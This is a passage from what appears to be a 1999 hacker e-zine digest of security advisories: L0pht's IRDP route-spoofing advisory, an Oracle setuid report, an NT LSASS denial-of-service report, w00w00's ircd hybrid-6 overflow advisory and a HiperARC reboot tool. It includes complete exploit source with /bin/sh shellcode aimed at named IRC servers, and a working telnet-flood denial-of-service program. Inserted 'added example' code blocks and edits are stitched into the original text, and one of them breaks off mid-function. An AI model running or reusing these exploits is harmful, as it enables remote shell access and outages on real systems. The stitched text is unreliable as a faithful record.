  . The system did not learn a default gateway from a DHCP server.
  . The system does not have any static routes.
  . The system does not have a valid /etc/defaultrouter file.

It should be noted that the important point of this advisory is not
that ICMP Router Solicitation and Advertisement packets have no
authentication properties. Yes, this is a problem but it has long been
known. The dangerous aspect comes in various MS platforms enabling this
protocol and believing it _even when the DHCP setup specifies not to use
IRDP_ (dhcp option #31) (ie the operating system does this even though
you believe you are telling it NOT TO).

The tool provided with this advisory is the basis of what would be used
for everything from web page hacks, stealing credentials, modifying or
altering data, etc. involving vulnerable systems. We believe most cable
modem DHCP clients and large internal organizations are at risk.

II. Risks
---------

The ICMP Router Discovery Protocol does not have any form of
authentication, making it impossible for end hosts to tell whether or
not the information they receive is valid. Because of this, attackers
can perform a number of attacks:

Passive monitoring:
   In a switched environment, an attacker can use this to re-route the
   outbound traffic of vulnerable systems through them. This will allow
   them to monitor or record one side of the conversation.

   * For this to work, an attacker must be on the same network as the
     victim.

Man in the Middle:
   Taking the above attack to the next level, the attacker would also be
   able to modify any of the outgoing traffic or play man in the middle.
   By sitting in the middle, the attacker can act as a proxy between the
   victim and the end host. The victim, while thinking that they are
   connected directly to the end host, is actually connected to the
   attacker, and the attacker is connected to the end host and is
   feeding the information through. If the connection is to a secure
   webserver that uses SSL, by sitting in the middle, the attacker would
   be able to intercept the traffic, unencrypted. A good example of this
   risk is on-line banking; an attacker playing man-in-the-middle would
   be able to intercept all of the banking information that is relayed,
   without the victim's knowledge. This is just a generic oversimplified
   scenario; there are obvious issues with certificates that the
   attacker would have to deal with if attempting this scenario.

   * For this to work, an attacker must be on the same network as the
     victim.

Denial of Service:
   Remote attackers can spoof these ICMP packets and remotely add bad
   default-route entries into a victim's routing table. Because the
   victim's system would be forwarding the frames to the wrong address,
   it will be unable to reach other networks.

   Unfortunately, DHCP has quickly become popular and is relied upon in
   most companies. In some cases, such as cable & *DSL modems, users are
   required to use DHCP. Because of the large number of vulnerable
   systems, and the fact that this attack will penetrate firewalls that
   do not stop incoming ICMP packets, this Denial of Service attack can
   become quite severe.

It should be noted that the above attacks are documented in Section 7 of
RFC 1256. However, the RFC states that the attacks are launched by an
attacker on the same network as the victim. In the Denial of Service
attack, this is not the case; an attacker can spoof IRDP packets and
corrupt the routing tables on systems that are on remote networks.

While these attacks are not new, the fact that Windows95/98 DHCP clients
have been vulnerable for years, is.
On systems running SunOS & Solaris, it is easy to find documentation on
IRDP by looking at the startup scripts or manpages. On Windows95/98,
however, information has only recently become available in the
Knowledge Bank.

III. Technical Details
----------------------

Upon startup, a system running MS Windows95/98 will always send 3 ICMP
Router Solicitation packets to the 224.0.0.2 multicast address. If the
machine is NOT configured as a DHCP client, it ignores any Router
Advertisements sent back to the host. However, if the Windows machine is
configured as a DHCP client, any Router Advertisements sent to the
machine will be accepted and processed.

Once an Advertisement is received, Windows checks to see how many
Gateway entries the packet contains. If the packet contains only 1
entry, it checks to make sure the IP source address of the Advertisement
is inside the host's subnet. If it is, the Router Address entry inside
the advertisement is checked to see that it is also within the host's
subnet. If so, a new default route entry is added. If the address is
outside the subnet, the advertisement is silently ignored.

If a host receives a Router Advertisement that contains 2 or more Router
Addresses, the host will process the packet even though the IP source
address is not local. If the host finds a Router Address inside the
advertisement that is inside the host's subnet, it will add a default
route entry for it. Because the host does not care about the IP source
address of the Advertisement as long as it has more than one entry,
attackers can now create bogus IRDP packets that will bypass
anti-spoofing filters.

Before the host can add a new default route entry, it has to determine
the route metric. On Windows95/98, normal default route entries obtained
from a DHCP server have a metric of 1. In order to determine the metric
for the default route entry obtained via IRDP, the Windows host
subtracts the Advertisement's Preference value from 1000. By creating an
ICMP Router Advertisement with a preference of 1000, the default gateway
route added will have a metric of 0, making it the preferred default
route. By adjusting the Lifetime value in the advertisement, an attacker
can adjust how many seconds the gateways are valid for.

DHCP Vendor Option #31, "Perform Router Discovery", has no effect on
disabling this. If you configure your DHCP server to implicitly disable
Router Discovery, the vulnerable Windows95/98 hosts will ignore this,
and continue to update their routing tables with information gleaned via
IRDP.

IV. Fixes / Work-arounds
------------------------

Firewall / Routers:
   Block all ICMP Type 9 & Type 10 packets. This should protect against
   remote Denial of Service attacks.

Windows95/98:
   The Microsoft Knowledge Base contains an article that gives info on
   how to disable IRDP. It can be found at:
   http://support.microsoft.com/support/kb/articles/q216/1/41.asp

   Brief Summary of article:
   IRDP can be disabled manually by adding the "PerformRouterDiscovery"
   value name and setting it to a dword value of 0, under the following
   registry key(s):

   HKLM\System\CurrentControlSet\Services\Class\NetTrans\####

   Where #### is the binding for TCP/IP. More than one TCP/IP binding
   may exist.

Solaris:
   Configure your host to obtain a default gateway through DHCP, static
   routes, or via the /etc/defaultrouter file. For more information on
   IRDP refer to in.rdisc's man-page.

V. Detection
------------

L0pht has released a NFR Intrusion Detection Module to detect both
Router Solicitations and Advertisements. You can find it at:
http://www.l0pht.com/NFR

NFR information can be found at http://www.nfr.net

VI. Source Code
---------------

L0pht is making available Proof-of-Concept code that will let
individuals test their systems & firewalls.
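The acceptance rules in section III (single-entry advertisements need an on-subnet source, multi-entry ones do not; metric = 1000 - preference against a DHCP default route metric of 1; lifetime in seconds) can be turned into a decoder that tells a defender, for a captured type-9 message, exactly which route a Windows95/98 DHCP client would install and why that is a problem. The code below is an added example and is not part of the advisory or of L0pht's rdp tool; the packet layout follows RFC 1256, and the host address, subnet and advertisement contents are constructed test data.

```python
"""Decode an ICMP Router Advertisement and predict what a Windows95/98
DHCP client, following the rules in the advisory above, would do with it.

Added example, not part of the L0pht advisory or its rdp tool. Packet
layout is RFC 1256: type 9, code 0, checksum, number of addresses, entry
size (in 32-bit words), lifetime, then (router address, signed 32-bit
preference) pairs. The acceptance rules and the metric formula
(1000 - preference, DHCP default route metric 1) are taken from the
advisory text; hosts, subnets and packets below are constructed.
"""
import ipaddress
import struct

ICMP_ROUTER_ADVERTISEMENT = 9
DHCP_DEFAULT_ROUTE_METRIC = 1     # metric of the DHCP-learned default route
WINDOWS_METRIC_BASE = 1000        # Windows metric = 1000 - preference


def inet_checksum(data):
    """RFC 1071 ones-complement sum; returns 0 for a message whose
    embedded checksum is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_advertisement(entries, lifetime=1800):
    """Constructed test input: an advertisement carrying the given
    (router_ip, preference) entries with a correct checksum."""
    msg = struct.pack("!BBHBBH", ICMP_ROUTER_ADVERTISEMENT, 0, 0,
                      len(entries), 2, lifetime)
    for ip, pref in entries:
        msg += ipaddress.IPv4Address(ip).packed + struct.pack("!i", pref)
    return msg[:2] + struct.pack("!H", inet_checksum(msg)) + msg[4:]


def parse_advertisement(pkt):
    """Return (lifetime, [(IPv4Address, preference), ...]); ValueError if
    the message is not a well-formed type-9 advertisement."""
    if len(pkt) < 8:
        raise ValueError("short ICMP message")
    typ, _code, _csum, naddr, esize, lifetime = struct.unpack_from("!BBHBBH", pkt, 0)
    if typ != ICMP_ROUTER_ADVERTISEMENT:
        raise ValueError("not a Router Advertisement (type %d)" % typ)
    if inet_checksum(pkt) != 0:
        raise ValueError("bad ICMP checksum")
    if esize < 2 or len(pkt) < 8 + naddr * esize * 4:
        raise ValueError("truncated or malformed address list")
    entries = []
    for i in range(naddr):
        off = 8 + i * esize * 4
        addr = ipaddress.IPv4Address(pkt[off:off + 4])
        (pref,) = struct.unpack_from("!i", pkt, off + 4)
        entries.append((addr, pref))
    return lifetime, entries


def assess_for_windows9x(pkt, ip_src, host_ip, netmask):
    """Apply the advisory's acceptance rules. Returns (accepted, warnings):
    accepted lists the (router, metric, lifetime) routes the host would
    install, warnings explains what is wrong with each."""
    net = ipaddress.IPv4Network((host_ip, netmask), strict=False)
    src = ipaddress.IPv4Address(ip_src)
    lifetime, entries = parse_advertisement(pkt)
    accepted, warnings = [], []
    if len(entries) == 1 and src not in net:
        return accepted, ["single-entry advertisement from off-subnet %s ignored" % src]
    if len(entries) >= 2 and src not in net:
        warnings.append("multi-entry advertisement from off-subnet %s is still "
                        "processed (anti-spoofing filter bypass)" % src)
    for addr, pref in entries:
        if addr not in net:
            continue                          # only on-subnet routers are installed
        metric = WINDOWS_METRIC_BASE - pref
        accepted.append((str(addr), metric, lifetime))
        if metric < DHCP_DEFAULT_ROUTE_METRIC:
            warnings.append("route via %s gets metric %d and outranks the DHCP "
                            "default route for %d seconds" % (addr, metric, lifetime))
    return accepted, warnings


if __name__ == "__main__":
    pkt = build_advertisement([("10.0.0.99", 1000), ("192.0.2.1", 0)], lifetime=9000)
    print(assess_for_windows9x(pkt, "192.0.2.10", "10.0.0.5", "255.255.255.0"))
```

The sample run reproduces the two points the advisory makes: a two-entry advertisement from an address outside the host's subnet is still processed, and an on-subnet entry with preference 1000 is installed at metric 0, ahead of the DHCP route at metric 1. An advertisement from a real on-subnet router with preference 0 is accepted at metric 1000 and raises no warning, and a message with a corrupted checksum is rejected before any rule is applied. The same parse step is what a detector watching for ICMP type 9 and 10 (section IV) would run on each matching packet.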
The source code can be found at:
http://www.l0pht.com/advisories/rdp.tar.gz

Usage is fairly straightforward:

Usage: rdp -v -l -s -d -p -t -i -S -D -R -r
   -v  verbose
   -l  listen mode
   -s  send mode
   -d
   -n
   -I
   -p
   -t
   -i
   -S
   -D
   -R
   -r

Misc software notes:

Listen Mode:
   Software listens for ICMP Router Solicitations. If the '-s' flag is
   specified as well, the software will answer the Solicitations with
   ICMP Router Advertisements.

Preference:
   If the preference is not specified, it will use a default of 1000,
   which will give the default route a metric of 0 on affected Windows
   systems.

2nd Router Addr:
   By using the '-r' flag and specifying a second router address entry,
   the packet can contain a bogus source address and still be processed
   for correct gateway entries by the

@HWA

71.0 Setuid problem in Oracle
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.6i
Message-ID: <19990817092232.B7591@securityfocus.com>
Date: Tue, 17 Aug 1999 09:22:32 -0700
Reply-To: aleph1@SECURITYFOCUS.COM
Sender: Bugtraq List
From: Elias Levy
Subject: Security Bug in Oracle
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Length: 1179
Sender: jason.axley@attws.com

---------- Forwarded message ----------
Date: Mon, 16 Aug 1999 23:51:53 +0200
From: Gilles PARC
Subject: Security Bug in Oracle

Hi Listers,

I discovered a new security problem with Oracle on Unix. Once again,
it's with a setuid program. Do not confuse this with a similar problem
corrected by ORACLE some months ago with a patch called setuid_patch.sh.

NEW PROBLEM: if you have installed Oracle Intelligent Agent, you will
find in $ORACLE_HOME/bin a program called dbsnmp. This program is setuid
root and was DELIBERATELY EXCLUDED by Oracle in the aforementioned
patch.

The security hole resides in the fact that this program executes a tcl
script (nmiconf.tcl) located by default in
$ORACLE_HOME/network/agent/config. Needless to say, you can easily
bypass this default and have your own malicious nmiconf.tcl script run
under root privileges.

I verified this on HP-UX 10.20 with Oracle 7.3.3 and 8.0.4.3, and on
AIX 4.3 with Oracle 8.0.5.1. But it's probably Unix generic.

Regards
Gilles Parc
Email : gparc@mail.dotcom.fr
carpe diem !!

----- End forwarded message -----

--
Elias Levy
Security Focus
http://www.securityfocus.com/

@HWA

72.0 Vulnerability In LSA on Windows NT SP5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

----- Forwarded message from "Galipeau, William" -----

Date: Thu, 12 Aug 1999 17:28:48 -0400
From: "Galipeau, William"
Subject: FW: Vulnerability In LSA on Windows NT SP5
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

I inadvertently sent this to the wrong address. My apologies.

-----Original Message-----
From: Galipeau, William
Sent: Thursday, August 12, 1999 10:15 AM
To: russ.cooper@rc.on.ca
Subject: Vulnerability In LSA on Windows NT SP5

Russ,

A few months ago I found a vulnerability in NT 4.0 configured with SP5.
I downloaded a trial copy of Network Associates Cyber Cop version 5.0.
I ran a scan using all the Denial of Service based attack options. All
failed but one: the "Windows NT- LSASS.EXE Denial of Service attack."
When you run a scan on a NT 4.0 machine configured with SP5 (with or
without the LSA3 hot fix) utilizing this option, the target machine will
lock, not allowing users to authenticate to the server remotely or
locally. The only way to correct the problem is to physically reboot the
server. Also, to make matters worse, the audit logs on the target server
do not illustrate where the attacks were launched from. Because Cyber
Cop allows you to run this scan on any IP or any host of IPs, an
intruder could attack a large base of servers in a relatively short
amount of time without leaving a reliable audit trail.
I reported this issue to Microsoft on 6/23/99 (I have an incident
number). I have been following up with Microsoft, but they have been
reluctant to provide much detail on the issue. Hopefully you can help
motivate them.

Thanks

----- End forwarded message -----

@HWA

73.0 w00w00's efnet ircd advisory (exploit included)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[http://www.w00w00.org, comments to shok@dataforce.net]

SUMMARY

efnet ircd hybrid-6 (up to beta 58) has a vulnerability that can allow
remote access to the irc server. In most cases, you'll gain privileges
of the 'irc' user.

COMMENTS

This vulnerability was discovered by jduck and stranjer of w00w00 at
least 2 months ago. After discussing the vulnerability, it was reported
to Dianora by jduck and fixed. Hopefully the vulnerable irc servers have
been fixed. If not, it's unfortunate Dianora didn't notify the
vulnerable irc servers or they didn't take these 2 months to fix
themselves (note: we didn't wait that long on purpose.. we were just
sidetracked with a million other things).

DESCRIPTION

The vulnerability is in the invite handling code (m_invite). In a
channel with operators (ops) and modes +pi (paranoid + invite-only), a
channel invitation is reported to all other operators. The buffer used
to store the invitation notice can overflow its boundaries by up to 15
bytes.

Steps:
1. Client 1 (9chars!10chars@trivial) joins #199chars
2. Client 2 (trivial!trivial@trivial) joins #199chars
3. Client 1 sets mode #199chars +pio Client 2
4. Client 1 invites Client 3 (9chars!10chars@63chars) to #199chars

Note: client 1 and client 3 should _not_ be from the same host. With our
exploit, client 3 (compile/run hostname.c) first, then compile/run
ircdexp.c.

Client #1's server = vulnerable irc server (such as irc.arpa.com)
Client #2's server = trivial
Client #3's server = ComStud irc server (such as irc.prison.net), because
                     it allows shellcode chars in hostname

Using the following spoofed host (59 chars):
shellcodeshellcodeshellcodeshellcodeshellcodeshellcode.AAAA
[The ComStud ircd will check for a '.']

Here, EIP = 0x41414141 (AAAA). The other registers are negligible. The
hostlen is actually 63 bytes, but for this specific overflow, EIP is
overwritten at buf[54-58].

We have to take stdout/stdin descriptors into consideration. We are very
limited in size (only have 54 bytes for shellcode), so we can't fit bind
shellcode. Instead, we took the standard Linux x86 shellcode, dropped
exit handling code, added a close'd stdin, dup'd cptr->fd (cptr is the
first argument passed to m_invite). Since we only have 54 bytes to work
with, we can't fit code in to close stdout and dup cptr->fd, so output
will be sent to whatever terminal ircd was started from. If you do not
wish for the output to be seen, redirect everything (via '>') to
/dev/null.

As for how to go about spoofing, you have options:
1) Use the old DNS poison caching method
2) Use custom "fake binds" that will just pass on your shellcode as a
   hostname in response to a DNS query (idea from nyt).

Option #2 is the approach we will take (hostname.c generates the
shellcode we'll use). This will work fine as long as your IP/hostname
hasn't already been cached. Because these "fake binds" are pretty
popular (or have been in the past), they should be easy to come by and
are outside the scope of this advisory.

So full steps are: the client with the spoofed hostname connects to a
ComStud ircd server (such as irc.prison.net), another client joins the
arbitrary client, and another client joins the target ircd hybrid-6
server (such as irc.arpa.com). Once the channel is +pi (and your
channel, ident, username, etc. are all the right length), invite the
client with the spoofed hostname.
Fine-tune until you have root.

Thanks to: stranjer and jduck for their input and discovery of this
vulnerability.

People that deserve hellos: Mike (mike@eEye.com), vacuum
(vacuum@technotronic.com), awr (andrewr@rot26.net), dmess0r
(dmessor@el8.org).

--
Matt Conover (Shok) & w00w00 Security Team

invitee: (hostname.c)

/*
 * ircd hybrid-6 exploit (invitee side)
 * Matt Conover (Shok) & w00w00 Security Team
 *
 * This is used to generate the shellcoded hostname, which is used to
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>

#define ERROR   -1
#define OFFSET  0
#define HOSTLEN 59 /* this is just the right len to overwrite eip */

unsigned long getesp();

/*
 * Linux x86 shellcode, for a one-sided (input only) shell
 * Shellcode close's and dup's stdin to your ircd sockfd, allowing
 * you to give input. If we had more room for shellcode, we could make it
 * a full duplex shell (two-sided). Unless you redirect output, it will
 * be sent to the terminal that ran ircd.
 */
char shellcode[] =
   "\xeb\x28\x5e\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x8b\x7e\x0d\x8a\x5f\x38"
   "\xb0\x29\xcd\x80\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e"
   "\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xd3\xff\xff\xff/bin/sh";

/* --------------------------------------- */

unsigned long getesp()
{
   __asm__("movl %esp,%eax"); /* return value stored in %eax with C */
}

int main(int argc, char **argv)
{
   char *buf, *bufptr;
   long addr;
   int i, bufsize = HOSTLEN, offset = OFFSET;

   if (argc > 3)
   {
      fprintf(stderr, "Usage: %s [bufsize] [offset]\n", argv[0]);
      exit(ERROR);
   }

   /* the original read argv[2]/argv[3] here, one past the arguments
    * actually supplied; argv[1] is bufsize and argv[2] is offset */
   if (argc >= 2) bufsize = atoi(argv[1]);
   if (argc == 3) offset = atoi(argv[2]);

   if (bufsize < HOSTLEN)
   {
      printf("bufsize too small.. setting to minimum bufsize (%d)\n", HOSTLEN);
      bufsize = HOSTLEN;
   }

   buf = malloc(bufsize+1);
   if (buf == NULL)
   {
      fprintf(stderr, "Error malloc'ing memory: %s\n", strerror(errno));
      exit(ERROR);
   }

   addr = getesp() - offset;
   printf("stack ptr (0x%lx) - offset (%d) = 0x%lx\n", addr + offset, offset, addr);

   /* layout: NOP sled, shellcode, '.', 4-byte return address */
   bufptr = buf;
   i = bufsize -  (strlen(shellcode) + 5), memset(buf, 0x90, i);
   bufptr = buf + i, memcpy(bufptr, shellcode, strlen(shellcode));
   bufptr = buf + strlen(shellcode) + i, *bufptr++ = '.';
   memcpy(bufptr, &addr, sizeof(addr));
   buf[bufsize] = '\0';

   printf("strlen(buf) = %d, strlen(shellcode) = %d\n\n",
          (int)strlen(buf), (int)strlen(shellcode));
   printf("%s\n", buf);
   return 0;
}

inviter: (ircdexp.c)

/*
 * ircd hybrid 6 exploit (inviter side)
 * Copyright (C) May 1999, Matt Conover & w00w00 Security Team
 *
 * When a channel is +pi with more than one op in it, it will send a
 * message to all other ops in the channel with the following format:
 *    INVITE: %s (%s invited %s [%s@%s])
 *
 * The steps to exploit this are as follows (requires 3 clients):
 *    1. Client A (9chars!10chars@trivial) joins #199chars
 *    2. Client B (trivial!trivial@trivial) joins #199chars
 *    3. Client A sets mode #199chars +pio Client B
 *    4. Client A invites Client C (9chars!10chars@58chars) to #199chars
 *
 * The code on the invitee's side is done separately.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define SAME    0
#define ERROR   -1
#define BUFSIZE 512
#define HOSTLEN 63
#define CHANLEN 200

/* NOTE: This code is not pretty, but tracking 3 clients isn't either.
 */

struct servstruct
{
   char *server;
   int port;
};

struct servstruct server[2] =
{
   { "irc.arpa.com",  6667 },
   { "irc.freei.net", 6667 }
};

char nick[3][10] = { "clientaaa", "clientbbb", "clientccc" };
int sockfd[2];
char srchost[HOSTLEN+1];
char channel[CHANLEN+1];
char readbuf[BUFSIZE], writebuf[BUFSIZE];
struct sockaddr_in servsin;

/* ---------------------------------------- */

void exploit();
void checkerrors();
void makeconn(int clients, int fd, char *nick, char *host, int port);

int main(int argc, char **argv)
{
   register int clients;
   struct hostent *hostent;

   if (gethostname(srchost, HOSTLEN) == ERROR)
   {
      fprintf(stderr, "error with gethostname(): %s\n", strerror(errno));
      fprintf(stderr, "continuing anyway.. but likely won't work\n");
      strcpy(srchost, "UNKNOWN");
   }

   for (clients = 0; clients < 2; clients++)
   {
      hostent = gethostbyname(server[clients].server);
      if (hostent == NULL)
      {
         /* the original format string had no %s for the error text */
         fprintf(stderr, "gethostbyname() error (client %d): %s\n",
                 clients, hstrerror(h_errno));
         exit(ERROR);
      }

      servsin.sin_family = AF_INET;
      servsin.sin_port = htons(server[clients].port);
      memset(&servsin.sin_zero, 0, sizeof(servsin.sin_zero));
      memcpy(&servsin.sin_addr, hostent->h_addr, hostent->h_length);

      sockfd[clients] = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      /* the client index is passed in; the original read an
       * uninitialised local `clients` inside makeconn() */
      makeconn(clients, sockfd[clients], nick[clients],
               server[clients].server, server[clients].port);
   }

   printf("Calling exploit()..\n");
   exploit();
   printf("All exploit work has been completed.\n");

   /* sockfd has two entries; the original loop closed a third */
   for (clients = 0; clients < 2; clients++) close(sockfd[clients]);
   return 0;
}

/* connect and login to irc server */
void makeconn(int clients, int fd, char *nick, char *host, int port)
{
   register int i;

   printf("Connecting to %s (%s) [port %d] as:\n%s!%s@%s\n\n",
          host, inet_ntoa(servsin.sin_addr), port, nick, "AAAAAAAAAA", srchost);

   if (connect(fd, (struct sockaddr *)&servsin, sizeof(struct sockaddr_in)) == ERROR)
   {
      fprintf(stderr, "error connecting to %s: %s\n", host, strerror(errno));
      exit(ERROR);
   }

   memset(readbuf, 0, sizeof(readbuf));
   memset(writebuf, 0, sizeof(writebuf));

   snprintf(writebuf, BUFSIZE-1, "NICK %s\n", nick);
   printf("Sending NICK info for %s\n", nick);
   if (send(fd, writebuf, strlen(writebuf), 0) == ERROR)
   {
      fprintf(stderr, "error with send() (%s): %s\n", nick, strerror(errno));
      for (i = 0; i < 2; i++) close(sockfd[i]);
      exit(ERROR);
   }

   snprintf(writebuf, BUFSIZE-1, "USER AAAAAAAAAA none none :w00w00\n");
   printf("Sending USER info for %s\n", nick);
   if (send(fd, writebuf, strlen(writebuf), 0) == ERROR)
   {
      fprintf(stderr, "error with send() (%s): %s\n", nick, strerror(errno));
      for (i = 0; i < 2; i++) close(sockfd[i]);
      exit(ERROR);
   }

   sleep(5); /* make sure we give sockbuf enough time to fill up */

   if (clients < 2)
   {
      channel[0] = '#';
      memset(channel+1, 'A', CHANLEN-1);
      channel[CHANLEN] = '\0';

      memset(writebuf, 0, sizeof(writebuf));
      snprintf(writebuf, BUFSIZE-1, "JOIN %s\n", channel);
      printf("\n[%s] /JOIN'ing channel\n", nick);
      if (send(fd, writebuf, strlen(writebuf), 0) == ERROR)
      {
         fprintf(stderr, "error with send() (client %d): %s\n", clients, strerror(errno));
         for (i = 0; i < 2; i++) close(sockfd[i]);
         exit(ERROR);
      }
   }

   printf("\n[Client %d] Checking for login errors...\n", clients);
   checkerrors();
   printf("[Client %d] Successfully logged in\n\n", clients);
}

/* check for errors in login */
void checkerrors()
{
   char *ptr;
   int res;
   register int clients, i;

   for (clients = 0; clients < 2; clients++)
   {
      /* the original initialised res to ERROR and tested it before the
       * first recv(), so its loop body never ran; read at least once and
       * keep reading while the buffer comes back full */
      do
      {
         res = recv(sockfd[clients], readbuf, sizeof(readbuf)-1, 0);
         if (res == ERROR)
         {
            fprintf(stderr, "error reading socket (client %d): %s\n", clients, strerror(errno));
            for (i = 0; i < 2; i++) close(sockfd[i]);
            exit(ERROR);
         }
         readbuf[res] = '\0'; /* terminate for strstr() */

         if (clients == 0)
         {
            ptr = strstr(readbuf, "hybrid-");
            if ((ptr != NULL) && (strncmp(ptr, "hybrid-6", 8) != SAME))
            {
               fprintf(stderr, "ERROR (client %d): the server must be a hybrid-6 ircd\n", clients);
               for (i = 0; i < 2; i++) close(sockfd[i]);
               exit(ERROR);
            }
         }

         ptr = strstr(readbuf, ":ERROR");
         if (ptr != NULL)
         {
            fprintf(stderr, "error with irc server (client %d):\n%s\n", clients, ptr);
            for (i = 0; i < 2; i++) close(sockfd[i]);
            exit(ERROR);
         }
      } while (res == sizeof(readbuf) - 1);
   }
}

/* main part of program */
void exploit()
{
   register int clients;

   memset(writebuf, 0, sizeof(writebuf));
   snprintf(writebuf, BUFSIZE-1, "MODE %s +ipo %s\n", channel, nick[1]);
   printf("%s will now attempt to set channel modes\n", nick[0]);

   /* Client A sets modes and ops Client B */
   if (send(sockfd[0], writebuf, strlen(writebuf), 0) == ERROR)
   {
      fprintf(stderr, "error with send(): %s\n", strerror(errno));
      for (clients = 0; clients < 2; clients++) close(sockfd[clients]);
      exit(ERROR);
   }

   sleep(3), checkerrors(); /* check to see if we had a race condition */

   printf("\nAttempting to invite %s (the final item)..\n", nick[2]);
   memset(writebuf, 0, sizeof(writebuf));
   snprintf(writebuf, BUFSIZE-1, "INVITE %s %s\n", nick[2], channel);

   /* ircd ownage/crash will occur during after this send() */
   if (send(sockfd[0], writebuf, strlen(writebuf), 0) == ERROR)
   {
      fprintf(stderr, "error with send() (client 0): %s\n", strerror(errno));
      for (clients = 0; clients < 2; clients++) close(sockfd[clients]);
      exit(ERROR);
   }

   /* should have stopped/crashed on server-side by now */
   checkerrors();
}

@HWA

74.0 hiperbomb.c - reboot a hiperarc router
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hello,

The attached program will reboot a 3com HiperARC. I made an attempt to
contact 3com before posting this report, however, I received no
response. By flooding the telnet port of a 3com HiperARC using the
provided program, the HiperARC unconditionally reboots. This program is
effective over all interfaces, including a dialup.

Regards,

Jonathan Chapman
Director of Network Security
FIRST Incorporated
jchapman@1st.net
www.1st.net

hiperbomb1.c

/* ---------------------------------------------------------------------
 * hiperbomb2.c - Reboots HiperARC faster.
 * ---------------------------------------------------------------------
 * (c) 1999 - Jonathan Chapman
 * ---------------------------------------------------------------------
 * Sends a high volume of IACs which eventually leads to a reboot of the
 * HiperARC. Brief testing indicated that this problem is most likely
 * specific to sending IACs rather than any other type of data. Further
 * research has shown that specific IAC patterns are more likely to cause
 * a reboot. In this example I use one of the most efficient combinations
 * I have discovered. Through my testing it usually required at least
 * 60,000 packets to cause the HiperARC to reboot.
 * --------------------------------------------------------------------- */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

char *chassis;
int sockfd, num_of_tries;

/* resolve the chassis name and open a TCP connection to its telnet port */
void connect_to_chassis(char *name)
{
    struct hostent *host;
    struct sockaddr_in remote;

    host = gethostbyname(name);
    if(!host) {
        fprintf(stderr, "Cannot resolve host %s.\n", name);
        exit(3);
    }

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if(sockfd < 0) {
        fprintf(stderr, "Cannot obtain descriptor.\n");
        exit(4);
    }

    memset(&remote, 0, sizeof(remote));
    remote.sin_family = AF_INET;
    remote.sin_addr = *(struct in_addr *)*host->h_addr_list;
    remote.sin_port = htons(23);

    if(connect(sockfd, (struct sockaddr *)&remote, sizeof(remote)) < 0) {
        perror("connect");
        exit(5);
    }
    return;
}

/* write the same three-byte pattern num_of_tries times */
void send_iacs()
{
    unsigned char reply[3] = {254, 36, 185};
    int k;

    for(k = 0; k < num_of_tries; k++) {
        write(sockfd, reply, 3);
    }
}

int main(int ac, char **av)
{
    if(ac < 3) {
        fprintf(stderr, "Syntax: %s <chassis> <num_of_tries>\n", av[0]);
        fprintf(stderr, "Approximately 60,000 packets usually takes care of the job.\n");
        exit(2);
    }

    chassis = av[1];
    num_of_tries = atoi(av[2]);

    fprintf(stderr, "Beginning attack on chassis %s [%d packets]\n", chassis, num_of_tries);
    connect_to_chassis(chassis);
    send_iacs();
    fprintf(stderr, "Attack complete.\n");
    exit(0);
}

@HWA

75.0 HP Security Bulletins Digest
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

HP Support Information Digests
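- Ed note on 74.0 above, before the HP digest proper: hiperbomb works by throwing telnet option-negotiation bytes at a listener that, on the evidence of Chapman's post, cannot survive tens of thousands of them. A telnet service that wants to live through this puts a per-connection cap on negotiation. Below is an added example of that check, written for this issue; it is not Chapman's code and not anything from 3Com. It is an RFC 854 IAC state machine with a negotiation budget; the budget of 32 and the replayed inputs are my assumptions. One caveat the post does not spell out: the triple hiperbomb writes, 254 36 185, begins with DONT (254) rather than IAC (255), so a parser that follows RFC 854 framing never sees an IAC command in it at all. The example shows that; how the HiperARC actually interpreted those bytes is not explained on the page.

```c
/* Per-connection telnet option-negotiation budget (RFC 854 framing).
 * Added illustration for HWA; not code from hiperbomb or from any 3Com
 * product. The budget value and the sample inputs are assumptions. */
#include <stddef.h>
#include <stdio.h>

#define TN_IAC  255   /* "interpret as command" */
#define TN_DONT 254
#define TN_DO   253
#define TN_WONT 252
#define TN_WILL 251
#define TN_SB   250   /* subnegotiation begin */
#define TN_SE   240   /* subnegotiation end */

enum tn_state { S_DATA, S_IAC, S_OPT, S_SB, S_SB_IAC };

struct tn_conn {
    enum tn_state state;
    unsigned long commands;      /* every IAC <cmd> seen */
    unsigned long negotiations;  /* DO/DONT/WILL/WONT only */
    unsigned long budget;        /* negotiations allowed before we drop the peer */
};

void tn_init(struct tn_conn *c, unsigned long budget)
{
    c->state = S_DATA;
    c->commands = 0;
    c->negotiations = 0;
    c->budget = budget;
}

/* Feed raw bytes from the socket. Returns the number of ordinary data bytes
 * in buf (commands stripped), or -1 as soon as the negotiation budget is
 * exceeded, at which point the caller should close the connection. */
long tn_feed(struct tn_conn *c, const unsigned char *buf, size_t len)
{
    long data = 0;
    size_t i;

    for (i = 0; i < len; i++) {
        unsigned char b = buf[i];
        switch (c->state) {
        case S_DATA:
            if (b == TN_IAC) c->state = S_IAC;
            else data++;
            break;
        case S_IAC:
            if (b == TN_IAC) {              /* IAC IAC is a literal 255 */
                data++;
                c->state = S_DATA;
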